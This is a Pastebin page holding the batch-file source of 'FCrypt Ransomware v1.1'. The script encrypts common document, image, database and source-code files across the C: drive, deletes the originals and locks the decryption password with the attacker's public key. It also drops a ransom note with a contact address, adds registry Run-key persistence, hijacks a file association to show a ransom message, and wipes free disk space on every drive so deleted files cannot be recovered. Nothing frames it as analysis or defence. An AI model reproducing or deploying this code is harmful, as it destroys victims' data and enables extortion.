Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- @shift
- @ECHO OFF
- ::Code By FIFCOM
- SetLocal EnableDelayedExpansion
- if not exist "%temp%\FCRYPT_VICTIM.TMP" (goto passgen
- ) else (goto END)
- :passgen
- cls
- if exist "%temp%\FCRYPT_PASSMD5.TMP" goto encrypt
- set wind=2&& set snow=1
- for %%1 in (0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z)do (set /a x+=1&& set x!x!=%%1)
- if "%wind%"=="2" (for /l %%1 in (1 1 %snow%)do (for /l %%2 in (1 1 10)do (set /a n%%2=!random! %% 62 +1
- call set 1%%1=!1%%1!%%x!n%%2!%%)
- set id=!1%%1!))
- set rand1=%random%
- set rand2=%random%
- set rand3=%random%
- set rand4=%random%
- set pass=%id%-%rand1%-%rand2%-%rand3%-%rand4%
- %MYFILES%\md5 -d%pass%>"%temp%\$"
- copy "%temp%\$" "%temp%\FCRYPT_PASSMD5.TMP"
- del "%temp%\$" >nul 2>nul
- goto encrypt
- :encrypt
- cls
- set /p passmd5=<"%temp%\FCRYPT_PASSMD5.TMP"
- for /r "C:\" %%i in (*.xls *.doc *.xlsx *.docx *.pdf *.rtf *.cdr *.psd *.dwg *.cd *.mdb *.1cd *.dbf *.sqlite *.jpg *.jpeg *.zip *.bmp *.txt *.rar *.mp4 *.sql *.c *.cpp *.java *.php *.asp *.svg *.psd *.bak *.html) do (
- %MYFILES%\svchost.exe -e %passmd5% "%%i" "%%i.FCrypt" >nul 2>nul && del "%%i" >nul 2>nul
- )
- del /f /q "%temp%\FCRYPT_PASSMD5.TMP" >nul 2>nul
- wscript.exe "%MYFILES%\delsc.vbs"
- goto pkgen
- :pkgen
- cls
- del %temp%\$
- echo.computername=%COMPUTERNAME%>"%temp%\FCRYPT_KEY.TMP"
- echo.username=%username%>>"%temp%\FCRYPT_KEY.TMP"
- echo.version=1.1>>"%temp%\FCRYPT_KEY.TMP"
- echo.decryptpass=%pass%>>"%temp%\FCRYPT_KEY.TMP"
- "%MYFILES%\gpg.exe" --import "%MYFILES%\FCRYPT_RSA_PUBLIC_KEY.TMP"
- "%MYFILES%\gpg.exe" -r FCrypt --yes -q --no-verbose --trust-model always --encrypt-files "%temp%\FCRYPT_KEY.TMP"
- del "%temp%\FCRYPT_KEY.TMP" >nul 2>nul
- C:\Windows\System32\certutil -encode "%temp%\FCRYPT_KEY.TMP.gpg" "%temp%\FCRYPT.KEY"
- copy /b "%MYFILES%\FCrypt.txt.tmp"+"%temp%\FCRYPT.KEY" "%temp%\#HELP-DECRYPT-FCRYPT1.1#.txt"
- del /f /q "%temp%\trustdb.gpg"
- attrib -s -h -r "%AppData%\gnupg\*.*"
- attrib -s -h -r "%AppData%\gnupg"
- del /f /q "%AppData%\gnupg\*.*"
- rmdir /s /q "%AppData%\gnupg"
- copy "%temp%\#HELP-DECRYPT-FCRYPT1.1#.txt" %userprofile%\Desktop\#HELP-DECRYPT-FCRYPT1.1#.txt
- reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "FCRYPT1" /t REG_SZ /f /d "notepad %temp%\#HELP-DECRYPT-FCRYPT1.1#.txt""
- reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "FCRYPT2" /t REG_SZ /f /d "attrib -h %userprofile%\Desktop\#HELP-DECRYPT-FCRYPT1.1#.txt"
- reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "FCRYPT3" /t REG_SZ /f /d "copy "%temp%\#HELP-DECRYPT-FCRYPT1.1#.txt" %userprofile%\Desktop\#HELP-DECRYPT-FCRYPT1.1#.txt"
- del /f /q "%temp%\*.gpg"
- del /f /q "%temp%\*.*xe"
- echo Y|assoc .FCrypt=FCRYPT
- echo Y|ftype "FCRYPT"=mshta.exe vbscript:Execute^(^"msgbox ^"^" Sorry, this file has been encrypted.^"^"^&vbNewLine^&^"^" More information:^"^"^&vbNewLine^&vbNewLine^&ChrW^(10139^)^&^"^" #HELP-DECRYPT-FCRYPT1.1#.txt^"^"^&vbNewLine^&vbNewLine^&^"^" [HELP:fcrypt@qq.com]^"^",16,^"^"FCrypt Ransomware v1.1^"^":close^"^)
- echo Y|assoc "FCRYPT"\DefaultIcon=%SystemRoot%\System32\shell32.dll,-48
- echo %random%%random%%random%>%temp%\FCRYPT_VICTIM.TMP
- if exist "%systemroot%\system32\cipher.exe" (
- FOR %%s IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :cipherw %%s
- goto END
- :cipherw
- cipher /w:%1:
- goto:eof
- :END
- exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement